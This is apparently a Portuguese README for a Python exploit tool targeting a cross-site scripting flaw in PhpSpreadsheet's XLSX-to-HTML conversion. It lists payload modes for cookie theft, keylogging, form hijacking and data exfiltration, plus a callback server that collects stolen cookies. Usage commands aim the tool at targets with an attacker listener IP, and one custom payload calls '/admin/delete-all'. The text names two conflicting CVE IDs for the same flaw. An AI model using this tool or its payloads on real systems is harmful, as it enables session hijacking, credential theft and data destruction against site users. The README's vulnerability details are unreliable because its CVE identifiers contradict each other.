
Este é um PoC/Exploit para a CVE-2024-47875, uma vulnerabilidade de XSS no PhpSpreadsheet.
Este é um PoC da CVE-2025-22131, uma vulnerabilidade de Cross-Site Scripting (XSS) no PhpSpreadsheet em versões anteriores a 2.2.2, 2.1.2 e 1.29.4. A vulnerabilidade reside na função generateNavigation(), que não sanitiza os nomes das planilhas durante a conversão de XLSX para HTML, permitindo a injeção de JavaScript malicioso.
CVE ID: CVE-2024-47875
Aviso do GitHub: GHSA-79xx-vf93-p7cx
Versões afetadas: PhpSpreadsheet < 2.2.2, < 2.1.2, < 1.29.4
Autor: Roj
Licença: MIT
Repositório: Repositório do PoC
📄 Gera arquivos XLSX maliciosos com payloads XSS personalizáveis
🛠️ Suporta vários tipos de payload:
cookie_theft: Rouba cookies de sessão
redirect: Redireciona usuários para um site controlado pelo atacante
alert: Exibe um alerta de teste para PoC
keylogger: Captura teclas digitadas
form_hijack: Intercepta envios de formulários
data_exfil: Exfiltra dados de um endpoint especificado
🌐 Servidor HTTP integrado para capturar callbacks do exploit
⬆️ Envia arquivos XLSX maliciosos para um endpoint alvo
💾 Salva dados capturados (ex.: cookies) em um arquivo JSON
🎨 Saída de terminal colorida para melhor legibilidade
🔍 Log detalhado para depuração
python exploit.py -h
🚀 Exemplos de uso:
#Basic cookie theft attack
python3 exploit.py http://target.htb 10.10.16.50
# Custom upload endpoint
python3 exploit.py http://app.htb 10.10.16.50 -e /api/file-upload
# Different payload types
python3 exploit.py http://target.com 10.10.16.50 -p keylogger
python3 exploit.py http://target.com 10.10.16.50 -p redirect
python3 exploit.py http://target.com 10.10.16.50 -p form_hijack
# Custom XSS payload
python3 exploit.py http://target.com 10.10.16.50 --custom "<script>fetch('/admin/delete-all')</script>"
Desejo receber feedbacks e boa sorte a todos.